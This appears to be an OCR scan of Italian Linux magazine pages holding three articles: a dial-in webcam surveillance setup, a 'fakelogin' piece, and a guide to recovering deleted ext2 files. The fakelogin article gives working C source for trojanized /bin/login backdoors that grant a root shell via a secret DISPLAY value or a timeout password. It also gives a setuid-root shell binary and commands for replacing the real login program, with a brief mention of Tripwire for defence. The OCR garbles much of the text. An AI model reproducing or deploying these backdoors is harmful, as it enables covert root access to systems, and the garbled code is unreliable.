alcuni concetti base del 
sistema, di creare 
soluzioni su misura 
componendo le nozioni 
che abbiamo appreso 
precedentemente, grazie 
alla nostra esperienza 
operativa con Linux. 
Dallo schema in figura 1 
si può notare 
l'architettura di massima 
che andremo ad 


esplodere nei paragrafi 
successivi. La scelta fatta 
di dare all'articolo un 
taglio non troppo tecnico 
è scaturita da alcune 
considerazioni: per prima 
cosa si vuole tenere 
lontano da queste pagine 
i neofiti di Linux, i quali 
spesso sentono il peso 
del primo approccio a 
procedure che sembrano 
incredibilmente . 
complicate e che invece, 
spesso, non lo sono 
affatto; inoltre non 
sarebbe possibile trattare 
in maniera esaustiva tutti 
gli argomenti coinvolti 
nella progettazione del 
nostro sistema (sono 
argomenti già trattati in 
passato dalla nostra 
rivista e lo saranno 
anche in futuro). L'ultimo 
motivo che è legato ad 
una riflessione semiseria 
sulla figura 


ricercata. 


dell'informatico: molti di 
noi, a furia di essere 
considerati degli 
smanettoni, finiscono per 
credere che l'unica cosa 
divertente dell'essere un 
informatico sia il parlare 
una lingua che nessun 
altro, a parte qualche 
altro amico smanettone, 
conoscere e saper 
mettere le mani su una 
macchina per fare un 
favore all'amico o al 
conoscente. Ebbene, 
sappiate che non vi è 
nulla di più lontano dalla 
verità. Il nostro è un 
mestiere complicato e 
gratificante ma, prima o 
poi, bisogna puntare a 
livelli di astrazione 
superiori; per cui poco 
importa (attenzione, in 
fase di progettazione!) 
quale sia il modulo per la 
nostra web-cam e come 
si faccia a caricarlo se 


e ___ 


prima non abbiamo bene 
In mente come usarla e 
cosa farci! 


Il sistema più 
in dettaglio 


Quello di cui abbiamo 
bisogno è, naturalmente, 
una web-cam, un 
sistema Linux 
(abbastanza recente da 
supportare la web-cam) 
con i seguenti pacchetti 
installati: 


® mgetty (http://alpha. 
greenie.net/mgetty/ ); 


° pppd; 


e Video 4 Linux 
(disponibile con i 
kernel più recenti); 


e software per 
effettuare grab dalla 
web-cam a riga di 
comando 
(http://www.exploits.0 
rg/vAl/); 


e web server Apache 
(http://www. apache. 
org/). 


La funzionalità che 
vogliamo ottenere è un 
sistema Linux che 
risponda alle chiamate 
ricevute dal modem 
(proprio come un isp) e 
ci permetta, tramite un 
server web, di 
controllare cosa stia 
succedendo, ad esempio, 
in casa nostra tramite 
una web-cam. 

Questo è possibile grazie 
alle capacità del 
programma mgetty, che 
consente di attivare un 
programma di login 
appena riceve una 
chiamata attraverso un 


certo device seriale. 
Vediamo la riga da 
aggiungere al file 
/etc/inittab per attivare 
quanto detto: 


in:23:respawn:/sbin/mgetty 
—x 3 ttySl 


In questo modo abbiamo 
specificato che l'mgetty 
si aspetta chiamate dial- 
in dalla porta COM2 
(ttyS1) alla quale, sul 
sistema, è collegato il 
modem; per ulteriori 
chiarimenti fate 
riferimento al manuale 
dell’mgetty (man 
mgetty). 

Altro componente 
fondamentale è il pppd, 
il demone che serve ad 
attivare una connessione 
punto-punto su di una 
linea seriale. Il pppd ha 
numerosi parametri di 
comunicazione per i 
quali vi rimando al solito 
manuale (man pppd). 
Creando un nuovo 
utente nel sistema 
chiamato ppp (ad es. con 
adduser) e specificando 
nel file /etc/passwd che 
vogliamo che la login 
shell sia un file da noi 
specificato, il gioco è 
fatto. Ecco la riga che 
dovrebbe apparire nel 
file /etc/passwd: 


ppp:x:503:503::/home/ppp: 
/home/ppp/ppplogin 


ecco, invece, il contenuto 
del file /home/ppp/ 
ppplogin: 


#!/bin/sh 
exec /usr/sbin/pppd 
modem debug 
10.0.0.1:10.0.0.8 


| parametri finali 
significano: <ip- 


locale>:<ip-remoto>; essi 
verranno usati dalla 
macchina che entra nel 
nostro sistema. Appena 
arriva una chiamata in 
entrata sul modem 
l'mgetty si attiverà e, 
dopo il log (che da 
remoto farete tramite 
terminale o con uno 
script), passerà 
l'esecuzione allo script 
ppplogin il quale attiverà 
il pppd. Supponiamo, 
ora, che abbiate la vostra 
web-cam come si dice 
“up and running”, cioè 
attiva e funzionante; ciò 
non dovrebbe risultare 
troppo difficile grazie 
all'aiuto dei nostri 
precedenti articoli 
sull'argomento oppure 
effettuando una piccola 
ricerca sull'argomento 
video4linux su internet. 
Vi assicuro che si tratta 
di semplici passaggi (a 
patto che ricompilare il 
kernel non rappresenti 
per voi un fatto 
agghiacciante). Quello di 
cui dovete assicurarvi è 
di riuscire ad ottenere 
almeno un frame dalla 
vostra telecamera nel 
formato jpeg, usando 
uno dei molti software a 
linea di comando che si 
trovano su internet. 
Ottenuto questo risultato 
vediamo come 


Telesorveglianza 
con Linux 


Figura 2 


La pagina web finita. 


automatizzarlo per 
ottenere una immagine 
sempre nuova ogni n 
secondi (in questo caso 
l'uso del cron non va 
bene perché la sua 
massima risoluzione è il 
minuto): 


#1/bin/sh 
while true; do 
sleep 55; 
<codice per generare il 
frame dalla vostra 
web-cam> 
done 


In questo esempio viene 
richiamato il programma 
che genera il frame ogni 
5 secondi. Ora non ci 
resta che mettere a 
posto la parte web. 


Setup 
della parte Web 


Ora che i vari 
automatismi funzionano 
bisogna metterli insieme. 
Nella Document Root del 
vostro Apache (nella 
RedHat è la directory 
/var/www/html) create 
una cartella chiamata 
webcam. Al suo interno 
creeremo il file 
index.html come segue: 


<!IDOCTYPE HTML PUBLIC 
"-//W3C//DTD HTML 4.0 
Transitional//EN"> 
<html> 
<head> 
<title>Telesorveglianza, 
con Linux</title> 
<script language= 
"JavaScript "> 
// file dell'immagine 
var File = "ultima.jpg"; 
function reloadimagel { 
theDate = new DateO; 
url=File; 
url+="?dummy="; 
url+=theDate.toString(10); 


000€ 


// cambia l'url dell'imma- 
gine "immagine" (vedi 
corpo del documento) 

document.immagine.sre = 

url; 

// ricarica l'immagine 

ogni 5 secondi (5000 
millisecondi) 
theTimer = setTimeout( 
"reloadimage0)", 5000); 
} 
</script> 
</head> 
<body onLoad= 
"javascript:reloadImage0 "> 
<table cellspacing="0" 
cellpadding="3"> 


<tr> 
<td> 
<h1>Telesorveglianza 
con Linux</h1l> 
</td> 


<td align="center"> 
<img src= "qccolor.gif" 
width="100" height= 


"100" alt="" 
border="0"> 
</td> 
</tr> 
<tr> 


<td colspan="2" align= 
"center "><img src= 
"ultima.jpg"name= 
"immagine" alt="" bor- 
der="1"> 
</td> 
</tr> 
</table> 
</body> 
</html> 


Come vedete abbiamo 
usato un trucchetto per 
evitare il fastidioso 
problema della cache di 
alcuni browser. Nella 
parte di codice 
JavaScript che si occupa 
di ricaricare ogni n 
secondi l'url dell'immagi- 
ne, abbiamo provveduto 
a specificare un parame- 
tro (dummy) di valore 
casuale sempre diverso, 
che non ha nessuno 
scopo se non quello di 
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ingannare il browser e 
forzarlo a ricaricare 
l'imagine anche se il 
nome è sempre uguale. 
Naturalmente bisogna 
fare in modo che 
l'immagine generata 
dallo script che abbiamo 
visto in precedenza sia 
raggiungibile dall’Apa- 
che. Divertitevi a fare 
qualche prova e prepara- 
tevi a proteggere l’og- 
getto delle vostre riprese 
da sguardi indiscreti. 


Protezione 
e Login 


Per quelli di voi che in 
fatto di sicurezza assu- 
mono atteggiamenti par- 
anoici, ecco come fare 
per proteggere la pagina 
della webcam da accessi 
indesiderati usando il 
sistema di autenticazione 
dell’Apache. Vorrei farvi 
notare che, per accedere 
alla pagina, bisogna 
comunque indovinare il 
numero di telefono 
(sapendo che c'è un 
computer che risponde), 
il login e la password del 
ppp ed infine sapere che 
c'è un web server attivo 


Password di rete 


(si potrebbe mettere 
l'’Apache in ascolto su 
una porta non standard). 
Inoltre, leggendo il 
manuale dell’ mgetty, 
scoprirete che ci sono 
dei parametri per 
accettare chiamate dial- 
in solo da determinati 
numeri di telefono o 
prefissi. Ma torniamo 
all'Apache. Per prima 
cosa dobbiamo creare un 
file degli utenti e delle 
password ed aggiungervi 
un utente (ad es. guest): 


# htpasswd -c /etc/httpd/ 
conf/ passwd.apache guest 
New password: guest123 
Re-type new password: 
guest 123 
Adding password for user 
guest 


Adesso bisogna modifi- 
care il file httpd.conf per 
“dire” all'’Apache di 
proteggere la nostra 
directory webcam 
usando il nuovo file delle 
password. Aggiungiamo 
ad httpd.conf queste 
righe: 


<Location /webcam> 
AuthType Basic 
AuthName “Acceso alla 

Web-Cam riservato, identifi- 


i Immettere il nome utente e la password. 


Sito: 


wwa.web.org 


Area autenticazione Accesso alla Web-Cam riservato, 
identificarsi. 


Nome utente [guest 
=" 


TT Salvala password nell'elenco delle password 


[ok] _ Amo | 


Password 
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Accesso alla risorsa protetta. 


carsi.” 

AuthUserFile 
/ete/httpd/conf/passwd.apa- 
che 

Require valid-user 
</Location> 


Con la direttiva require 
valid-user abbiamo speci- 
ficato all'Apache che, 
qualora aggiungessimo 
altri utenti al file delle 
password, anch'essi 
avrebbero accesso alla 
risorsa. 


Conclusioni 


Linux è veramente un 
sistema versatile e 
modulare. Prima o poi 
tutto quello che a fatica 
si è imparato torna utile 
nella soluzione di proble- 
mi di varia natura. Quello 
che abbiamo visto in 
questo articolo è un inte- 
ressante collage di possi- 
bilità che ci offre l'uso 
più approfondito di Li- 
nux; con un palmare che 
si connette ad Internet 
tramite un telefonino do- 
tato di porta ad infraros- 
si, potrete usare questo 
sistema per controllare 
cosa avviene a casa vo- 
stra veramente dovun- 
que. Naturalmente biso- 
gna modificare la pagina 
html visto che quel tipo 
di piattaforma non sup- 
porta il JavaScript. Il fat- 
to che il vostro sistema 
Linux possa rispondervi 
usando una connessione 
“sicura” perché non con- 
divisa sulla rete internet, 
offre un ventaglio di nuo- 
ve possibilità che vi invi- 
to a considerare e classi- 
ficare. Buon divertimento 
e arrivederci al prossimo 
articolo. 

Giuseppe Tradigo. 


FAKELOGIN 


Ovvero come entrare in 
un sistema con un login 
fasullo e con permessi 

di amministratore 


A livello di sicurezza di rete, uno dei trojan piu' 
utilizzati da un hacker (o cracker), e' il fakelogin. Di 
cosa si tratta effettivamente? Un qualunque utente, 
per potersi autentificare nel sistema necessariamente 
è tenuto a dover inserire login e password... 


LL Il utente, quindi inse- 
rirà tali informazioni, 
e se queste risulte- 

ranno esatte, potrà procede- 


re nell'utilizzo della macchi- 
na. 


gid/uid/suid/ 
setgid/setuid 


Supponiamo che un generi- 
co utente, (estraneo agli 
utenti loggati nella macchi- 
na), abbia avuto accesso alla 
stessa con permessi di am- 
ministratore ed abbia modi- 
ficato il programma: 


-<TWXP-Xr-xX l root root 
18972 apr 8 16:12 


/bin/login 


La modifica principale ap- 
portata sarà sicuramente 
quella di aver inserito 
un'istruzione condizionale 
(if), che compari un login ed 
una password da lui scelti, 
senza procedere al controllo 
dell'esistenza degli stessi nei 
file di controllo: 


-TW-P--r-- 1 root root 1232 
mag 17 15:18 /etc/passwd 

-TW----- 1 root root 939 
mag 16 14:43 /etc/shadow 


Se il login e la password im- 
messi, realmente corrispon- 
dono, l'operazione di login si 
preoccuperà di eseguire le 


seguenti chiamate al Kernel: 


#define __NR_setuid 23 
#define __NR_setgid 46 


Mediante le sopra citate 
chiamate, vengono di fatto 
impostati i permessi neces- 
sari di amministratore a co- 
lui che furtivamente entra 
nella nostra box Linux. 
Esempio: 


main O 

{ setuid(0); 
setgid(0); 
system("/bin/sh"); } 


Funzionera mai?! 


Procediamo nello scrivere le 


brevi righe di codice di cui 
sopra, nel file amministrato- 
re.c, successivamente impar- 
tiamo al sistema i seguenti 
comandi: 


[root@dns /tmp]# gcc 
-o amministratore ./ammini- 
stratore.c 
[root@dns /tmp]# chmod 
4755 ./amministratore 


Mediante le due istruzioni, 
impostiamo al proprietario 
del file (ossia all'utente root), 
i permessi di SUID (Set User 
ID). Proprio grazie a questo 
flag, all'atto di esecuzione 
del programma, verrà ora 
fatto uso degli /D del pro- 
prietario del file, quindi l'ap- 


plicazione sarà in grado di 
richiamare le funzioni privi- 
legiate come le syscall 23 e 
46 del kernel Linux poiche' 
l'utente loggato nel sistema 
risulterà proprio l'utente 
root. 


[root@dns /tmp]# ls -la 

./amministratore 
-TWSr-xT-x l root root 13865 
set 18 23:26 
./amministratore 

[root@dns /tmp]# id uid=0 
(root) gid=0(root)gruppi=0 
(root), 1 (bin), 8(daemon), 
3(sys),4(adm),6(disk), 
10(wheel) 


E' facile notare come abbia- 
mo ora settati i permessi di 
root ossia: 


UID=0 e GID=0 
Continuiamo... 
[root@dns /tmp]# su prova 


Creiamo quindi un utente di 
prova, (username 'prova') 
impartendo il comando SU, 
perderemo i privilegi di root 
e acquisteremo i privilegi di 
‘prova’; 


[prova@dns /tmp]$ id 

uid=500(prova) 

gid=500(prova,) 
gruppi=500(prova) 


Notiamo come i privilegi di 
UID (USER ID) e di GID 
(Group ID) siano pari a 500. 
Da sottolineare anche come 
nel prompt, a differenza di 
quando eravamo loggati co- 
me utenti root, e compariva 
il carattere #, ora compaia il 
carattere $. 


UID e GID, cosa 
significano? 


Nei sistemi unix-like colui 


che ha UID tendende a 0, 
gode di privilegi maggiori ri- 
spetto a colui che mostra 
valori ID più “alti”. L'ID 0, e' 
assegnato per default solo 
all'utente root, (ed a qualche 
malintenzionato, che ag- 
giunga un account “fasullo” 
nei file delle password, con 
UID e GID pari a 0, o che 
meglio ancora usa il fakelo- 
gin). Verifichiamo che real- 
mente siamo loggati con i 
privagli di root: 


[prova@dns /tmp]$ 
./amministratore 
sh-2.04# id 
uid=0(root) gid=0(root) 
gruppi=500(prova) 
sh-2.04# 


Ecco dimostrato teoricamen- 
te la pericolosità nell'utilizzo 
di un aggeggio di questo ge- 
nere. Ma come realizzare 
praticamente quanto appena 
detto? Si preferisce modifi- 
care il programma originale 
o si usa qualche stratagem- 
ma? 


Fakelogin, 
fal da te! 


Esistono 2 metodi molto uti- 
lizzati per realizzare un fake- 
login: 


1)Trasmettere una password 
contenuta in una ENVIRO- 
MENT al programma 
troiano del login. 


2) Digitare il login entro un 
determinato periodo di ti- 
meout. 


| programmi scritti qui di se- 
guito, sono stati testati sui 
seguenti sistemi operativi: 


- Linux 
- FreeBSD 
- OpenBSD 


- NetBSD 

- SunOS 5.5 / 5.6 / 5.7 /5.8 

- IRIX 6.2 / 6.3 /6.4/6.5/ 
6.5.2 

- Digital Unix 4.0 

- Hp-Ux 


In ogni caso, dovrebbero es- 
sere compatibili anche con 
altri sistemi unix-like. Com- 
prendiamo quindi la perico- 
losita' di tali programmini, 
che come vedremo di segui- 
to risultano abbastanza ba- 
nali, ma altamente funziona- 
li e ricordiamolo ancora una 
volta, di enorme pericolo- 
sità. Esaminiamo il primo 
metodo, ovvero il login me- 
diante troiano con passata 
da un ENVIROMENT: 


#include <stdio.h> 
#define PASSWORD 
"ioprogrammo" 
#define _PATH_LOGIN 
"/bin/login-non-troiano" 
main (arge, argv, envp) 
int argc; 
char **argv, **envp; 
{ char *display = 
getenv(" DISPLAY"); 
if ( display == NULL ) 
{ execve(_PATH_LOGIN, 
argv, envp); 
perror(_PATH_LOGIN); 
exit(1); } 
if (Istremp(display, 
PASSWORD)) 
{ system("/bin/sh"); 
exit(1); } 
execve(_PATH_LOGIN, argv, 


envp); 
exit(1); } 


Quando una connessione 
viene stabilita via Telnet, a 
parte l'ip, la porta sorgente 
ed altri dati di chi richiede la 
connessione, vengono tra- 
smesse anche le variabili di 
sistema, come la ENVIRO- 
MENT DISPLAY. 

Il nostro piccolo programmi- 
no, non fa altro che control- 
lare che la variabile DI- 


SPLAY non sia uguale a 
NULL ed esegue la shell 
/bin/sh. Avverto già il pen- 
siero di qualcuno che dice: 
“Come mai non vengono ef- 
fettuate le famose chiamate 
di sistema per autentificarsi 
come root?” Semplice... il 
programma /bin/login, viene 
richiamato dal demone: 
in.telnetd con i permessi di 
SUID: 


[root@dns /root}# ls -la 
/usr/sbin/in.telnetd 
-TWSP-XT-X 1 root root 
37436 gen 22 R001 
/usr/sbin/in.telnetd 


A 


|--> Ecco qui i permessi 


Di conseguenza /bin/sh ver- 
ra' eseguito con i permessi 
di root. E' da notare come 
vengano passate le ENVIRO- 
MENT trasmesse da colui 
che richiede la connessione, 
in caso che questi non dia la 
password giusta viene ese- 
guito il vero (sempre che 
quest'ultimo non sia a sua 
volta trojanizzato :))): 


execve(_PATH_LOGIN, argv, 
envPp); 


Per chi non ricordi la sintassi 
dell'istruzioni execve, ecco 
qui un breve riepilogo: 


int execve (const char 
*filename, char *const argv 
], char *const envpl]); 


1° parametro: file da esegui- 
re; 


2° parametro: argomenti da 
passare al programma; 


3° parametro: Enviroment 
da passare al programma. 


Non ci rimane quindi che te- 
stare la nostra applicazionci- 
na: 


[root@dns /root]# gcc 
-0 troiano ./troiano.c 
./Itroiano.c: In funetion “main': 

./troiano.c:9: warning: 

initialization makes pointer 
from integer without a cast 

[root@dns /root]}# mv 
/bin/login /bin/login-non- 
troiano 

[root@dns /root]# mv 
./troiano /bin/login 


Non tenete conto del war- 
ning, durante la compilazio- 
ne. Rinominiamo il nostro fi- 
dato (ne siamo sicuri ?) /bin 
/login in /bin/login-non-troia- 
no e spostiamo il nostro 
troiano da ./troiano in 
/bin/login. 


Ed ora arriva 
il bello... 


[root@dns /root]# telnet 
localhost 
Trying 127.0.0.1... 
Connected to dns.r00t.org 
C127.0.0.1). 
Escape character is '/]'. 
Red Hat Linux release 7.1 
(Seawolf) 
Kernel 2.4.2-2 on an i686 
login: ioprogrammo 
Password: 
[ioProgrammo@dns 
ioprogrammo]$ 


Da bravo, mi sono loggato 
nel sistema e mi accingo ad 
utilizzare la mia box... Ma 
come si fa invece ad entrare 
direttamente come utente 
root ? 


[root@dns /root]# export 
DISPLAY= "ioprogrammo" 
[root@dns /root]# telnet 
localhost 
Trying 127.0.0.1... 
Connected to dns.r00t.0rg 
(127.0.0.1). 
Escape character is '4]'. 
Red Hat Linux release 7.1 
(Seawolf) 


Kernel 2.4.2-2 on an i686 
sh-2.04# id 

uid=0(root) gid=0(root) 
sh-2.04# 


Sorpresi, eh ? Come notere- 
te si tratta di una soluzione 
molto semplice ma efficace 
che a livello di programma- 
zione, non costa assoluta- 
mente nulla e risolve (per i 
hacker/cracker) un problema 
in maniera ottimale e che 
crea un problema in più per 
l'amministratore della mac- 
china. 


Il metodo 
del timeout 


#include <signal.h> 
#include <stdio.h> 
#include <string.h> 
#include <unistd.h> 
#define REAL "/bin/.login" 
#define TROJAN "/bin/login" 
#define ROOT "iopr" 
char **execute; 
char passwd[5]; 
int main(int arge, char 
*argvi]) 
{ void connection(); 
signal(SIGALRM, 
connection); 
alarm(Q); 
execute=argv; 
*execute=TROJAN; 
scanf("%s",passwd); 
if(stremp(passwd,ROOT) 
==0) 
{ alarm(0); 
execl("/bin/sh", 
"/bin/sh","-i",0); 
exit(0); } 
else 
{ execv(REAL,execute); 
exit(0); 
} 
} 
void connectionO 
{ execv(REAL,execute); 
exit(0); 


Anche in questo caso, per 


chi non avesse familiarità 
con l'istruzione signal, ne ri- 
capitoliamo la sintassi, così 
come anche della funzione 
Alarm: 


void (*signall(int signum, 
void (*sighandler) 
(int))) (int); 


1° parametro: segnale che 
attendiamo. 


2° parametro: codice che 
eseguiamo alla ricezione 
del segnale 


unsigned int alarm 
(unsigned int seconds); 


1°parametro: secondi da at- 
tendere prima di trasmet- 
tere il segnale SIGALRM 


Il funzionamento e' semplice 
ed ingegnioso, se entro due 
secondi non si inserisce la 
password, nel nostro caso 
'iopr', viene eseguito il pro- 
gramma definito in REAL, al- 
trimenti sara' eseguito il no- 
stro /bin/sh. Questo pro- 
gramma al contrario dell'al- 
tro, funziona anche se appli- 
cato con altri demoni come 
pop3, imapd. 


Come proteggersi ? 


A questo punto, prima di 
concludere, e' doveroso dare 
qualche dritta su come pro- 
teggersi ! Per i sistemi 

Linux, consiglio caldamente 
TripWire (www.tripwire.org), 
una semplice applicazione 
che controlla le alterazioni 
del sistema, monitorando i 
binari e controllando che gli 
stessi non siano di lunghez- 
za diversa, o nel caso in cui 
fossero di medesima lun- 
ghezza, che il calcolo della 
tabella Hash degli stessi, sia 
uguale a quello risultante dai 
calcoli effettuati durante la 


prima esecuzione! Per altri 
sistemi unix-like, personal- 
mente non conosco pro- 
grammi che effettuano tali 
operazioni; è bene anche ri- 
cordare che per inserire i 
trojan di cui abbiamo parla- 
to, bisogna comunque esse- 
re identificati dal sistema co- 
me amministratori e se qual- 
cuno lo e' diventato senza 
autorizzazione nel vostro si- 
stema informatico, significa 
che non e' stato protetto co- 
me si deve. 


Conclusioni 


Abbiamo visto in questo ar- 
ticolo, seppur molto tecnico 
e non molto descrittivo, co- 
me vengono utilizzate alcune 
semplici tecniche di pro- 
grammazione per lo scopo 
che volevamo raggiungere. 
Si capisce che scovare un 
trojan non e' operazione 
semplice, essenzialmente 
perchè quando ne siamo af- 
fetti, non pensiamo mai di 
esserlo! E' buona norma, 
mantenere la propria pas- 
sword di amministratore al 
sicuro ed aggiornarsi sem- 
pre sui vari demoni vulnera- 
bili ai vari tipi di attacco e se 
non si e' sicuri di chi andrà 
ad utilizzare il sistema, infor- 
marsi sui vari applicativi che 
vengono installati. Vi lascio 
suggerendovi un sito, conte- 
nente dei mirror di moltissi- 
mi siti hackerati nel corso 
degli anni, per farvi capire 
quando la sicurezza informa- 
tica sia tenuta (a mio parere) 
in bassa considerazione..... 
- l cretini sono sempre piu' 
ingegniosi delle precauzioni 
che si prendono per impe- 
dirgli di nuocere. Ed in que- 
sto caso non parliamo di 
cretini :) (dall'ottava frase dei 
corollari sulla legge di 
Murphy). 

Francesco Marasco 


poco 


File cancellati? 
No problem! 


Fai poca attenzione cancellando dati e file 
importanti? La disperazione ti assale? Rilassati: 
quest'articolo risolvera’ i tuoi problemi, 
aiutandoti, nel possibile, a recuperare i dati 


alutare il partiziona- 

mento del proprio 

hard disk e' il primo 

passo da compiere 
per avvantaggiarci qualora 
fosse necessario recuperare 
dei dati distrattamente can- 
cellati. Il termine ‘partizione’ 
identifica un'area dell' hard 
disk (unita' di misura espres- 
sa in blochi) concepita dal 
sistema operativo, come uni- 
ta' disco aggiuntiva (virtuale). 
Per capire meglio il concetto 
si puo' prendere ad esempio 
il tipico partizionamento di 
un disco che si ha in una 
distribuzione Suse. L'area di- 
sco è gestita dal sistema ope- 
rativo in blocchi e frammenti 
di blocchi (in un file system di 
tipo ext2 il blocco e il fram- 
mento di blocco devono ne- 
cessariamente avere uguale 
dimensione). | file, avendo di- 
mensione variabile, possono 
eccedere il singolo blocco: 
una sezione dell'unità è quin- 
di sprecata per tenere traccia 
di questo tipo di allocazione. 
E possibile controllare l'effet- 
tiva disposizione di file nel 
nostro hard disk lanciando 
da shell il comando: 


e 2001/Gennaro 2002 


bash-2.05$ df -i 
Filesystem Inodes IUsed 
IFree IUse% Mounted on 
/dev/hda? 1114112 
192886 921226 18% / 


All'interno della nostra distri- 
buzione abbiamo all'incirca 
193.000 file disposti in 
1.114.112 inodes (l'inode 
contiene tutte le informazioni 
su un file, eccetto il nome). Le 
decisioni da prendere duran- 
te la fase di partizionamento 
devono tenere conto: 


*_ del ciclo di vita dei file; 
e della possibilita' di back- 
up/restore; 


Riferendosi alle directory S0O- 
litamente esistenti all'interno 
del sistema operativo, /bin, 
/sbin, /usr/bin, /usr/sbin, /ho- 
me, /var, e' utile ricordare 
che: 


° le directory '/bin, /sbin, 
/usr/bin, /usr/sbin' solita- 
mente godono di vita dura- 
tura (solitamente all'inter- 
no di queste sono contenu- 
ti i comandi); 

° le direcotry 'home' godono 


cancellati. 


di un ciclo di vita di media 
durata (all'interno di que- 
ste vengono solitamente 
posizionati i dati persona- 
li); 

* le directory '/var, /tmp' go- 
dono di vita breve (all'in- 
terno di var, vengono soli- 
tamente registrati i file di 
log, mentre, all’interno di 
‘tmp’ vengono salvati dati 
temporanei). 


point (in fase di installazio- 
ne) all'interno della directory 
home. 


Accorgimenti 


Prevenire e' meglio che cu- 
rare. Cosa fare? Prendere ac- 
corgimenti per evitare even- 
tuali delete indesiderati e' 
prerogativa di ogni buon si- 
stemista. Linux ci permette 
di proteggere i file sia: 
Solitamente i file di backup 
vengono posizioniati all'inte- » 
no della directory dell'utente 
(/home). Quindi? Come parti- 
zionare il disco rigido? La co- 

sa migliore da fare e' creare 

una partizione ad hoc per il ° 
contenimento dei dati ed in 
questa generare un mount 


impostando i permessi a 
440 (in questo modo il 
sistema chiedera' una con- 
ferma alla richiesta di can- 
cellazione di file); 

creando un hard link all'in- 
terno di una sub/hidden 
directory (creazione della 


Ciclo di vita file 


de" 


-- 


e _| 


Vita Duratura 
in, /sbin, 
Sust/bin, 
/usr/sbin) 


Vita Media | 


Vita Breve | 
Directory utente Ù) 


(var, finip) 


Figura 1 


identificazione area disco fisso in blocchi (Suse 7.2). 


TI arngramma Frrsk ha LIES la seeuerte COREATAAE del fdisen rigori 
Dia /Uev/sda 255 Testine 63 Selleri i11C Cilinuri. 


Jn cilindro comprende 8225280 kyte. 
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Tne number of cylinders for tris cisk is set to 1115 
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with trat, tut tris is larger “than 1024. 


and could in SSIS setups cause pretlems with: 
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dispositivo 


QContanuare 


Figura 2 


Ciclo di vita dei file. 


directory utilizzando il co- 
mando 'mkdir nome' se- 
guito da '/n' per la creazio- 
ne del link); 

utilizzo di attributi proprio 
del filesystem linux (ricor- 
do che nell'articolo viene 
preso in considerazione il 
solo filesystem ext2): 


append-only: l'utilizzo 
dell'attributo ‘solo ag- 
giunte' non permette 
all'utente la cancellazione 
del file (possibile solo ag- 
giungere dati al file). Im- 
postare l'attributo digitan- 
do ‘chattr +a nome. file'; 
immutabile: l'utilizzo del- 
l'attributo ‘immutabile' 
non permette di interagi- 
re in nessun modo con il 
file (nessuna possibilita" 
di modificare, cancellare, 
collegare, rinominare il 
file oggetto dell'attributo). 
Impostare l'attributo digi- 
tando ‘chattr +i nome_ 
file‘; 

undeletable: l'utilizzo 
dell'attributo ‘non-cancel- 
labile' inabilita l'utente 
alla cancellazione del file 
(il file viene spostato in 
una directory sicura, 
'trash', dove, qualora fos- 
se necessario, puo' venire 
recuperato). Sfortunata- 
mente l'undelete dei file 
non e' caratteristica im- 


cccti Tipo della partizione 
Linux native 
Inux Guap 


Linux native 
Linux native 


<Anni llarp > 


plementata all'interno del 
kernel, risulta, quindi, 
fondamentale, ai fine del- 
l'implementazione, ag- 
giornare il proprio kernel 
facendo ricorso a patch 
specifiche (www.linuxhp. 
com). 


Nel caso sfortuito in cui nes- 
sun accorgimento fosse sta- 
to preso e cancellassimo 
inavvertitamente i file dati e' 
possibile recuperare o l'80% 
dei file persi, qualora il siste- 
ma sia effettivamente mul- 
tiutente, o il 94% dei dati 
perduti, qualora il sistema 
linux venga utilizzato come 
workstation (dati tratti dal 
'Linux Ext2fs Undeletion Mi- 
ni Howto' di Aaron Crane). A 
cosa e' divuta questa diffe- 
renziazione? Semplice: lo 
spazio liberato dalla cancel- 
lazione del file e' messo a di- 


sposizione del sistema che 
rende i blocchi, precedente- 
mente occupati, liberi per 
future allocazioni. Piu' vi e' 
movimento di file all'interno 
del filesystem minori saran- 
no le possibilita' di recupero 
di file (maggiore sara! il li- 
vello di frammentazione del 
disco minori saranno le pro- 
babilita' di poter leggere il fi- 
le perso integralmente). 


Recupero file 
cancellati 


Due sono le metodologie 
possibili per il recupero dei 
file cancellati: 


1. scansione inode e riversa- 
mento dati all'intero di file 
creati ad hoc; 

2. azione diretta sul filesy- 
stem. 


Seppur piu' veloce l'iter indi- 
cato al punto 2 e' il meno 
sicuro (identificazione inode 
contrassegnati da attributo 
'deletable' e successivo ripri- 
stino situazione originaria). 
Lenta ma piu' sicura la mo- 
dalita' di recupero file del 
punto 2: identificazione dati 
all'intero dello spazio disco 
(allocazione dati in partizio- 
ne) e riversamento di questi 
in nuovi file. In pratica come 
agire? Qualsiasi sia la nostra 
scelta d'azione sara' indi- 
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Creazione mount point per la directory home. 


spensabile ‘smontare' il file- 
system. Importante la repen- 
tinita' dell'azione: maggior 
sara' il gap temporale mino- 
resara' la probabilita' di un 
recupero dati, causa ripristi- 
no risorse (un'inode non uti- 
lizzato viene rimesso a di- 
sposizione del filesystem) 
Da shell digitiamo: umount 
/home (parto dal presuppo- 
sto che i dati siano contenuti 
all'interno della directory 
utente). Qualora fossero pre- 
senti processi attivi all'inter- 
no del filesystem da ‘smon- 
tare', questi dovranno esse- 
re terminati (errore ‘Resour- 
ce busy). Monitoriamo i 
processi attivi digitando da 
shell: 


fuser -v -m /hard 
blackkane 134 frce. startx 
blackkane 141 frce. xinit 
root142 ....m X 
blackkane 145 frce. xinitre 


blackkane 14” free. 
startkde 

blackkane 167 free. 
kdeinit 

blackkane 169 frce. 
kdeinit 

blackkane 171 frce. 
kdeinit 

blackkane 174 free. 
artsa 

blackkane 17? free. 
kdeinit 

blackkane 182 frce. 
kdeinit 

blackkane 184 free. 
knotify 


Dopo aver valutato l'impor- 
tanza del processo (uccidere 
processi a casaccio potrebbe 
portare al crash del sistema) 
si puo' terminare inviando 
un segnale SIGKILL: 


fuser -k -v -m /hard 
Alternativamente impartia- 


mo un segnale SIGTERM: 


fuser -k -TERM -v -m /hard 


co 


Directory 


Directory 


Î Subdirectory i 
Hard Link 


Figura 4 


Schema chiarificatore creazione link in directory nascosta. 


Nel primo caso viene inviato 
un segnale di interruzione 
non intercettabile che porta 
alla terminazione del pro- 
cesso (nessuna possibilita' 
di eseguire salvataggio/ sca- 
rico dati), mentre nel se- 
condo il segnale inviato e' 
intercettabile (mittente un'al- 
tro processo). 


Filesystem 


Ma come 'smontare' una 
partizione che stiamo usan- 
do? Beh, copiamola all'inter- 
no di un'altra disponibile: cp 
/hard /root e rimontamola: 
mount -0 loop /root /mnt, In 
questo modo e' stata copiata 
la partizione raw 'hard' all'in- 
terno della partizione root'e 
successivamente, questa, e' 
stata "imontata' in loopback. 
Quindi: 


* creiamo una direcotry in 


una delle partizioni dispo- 
nibili (possono essere uti- 


Accorgimenti 


na Utilizzo attributi 


Figura 5 


Attributi filesystem. 


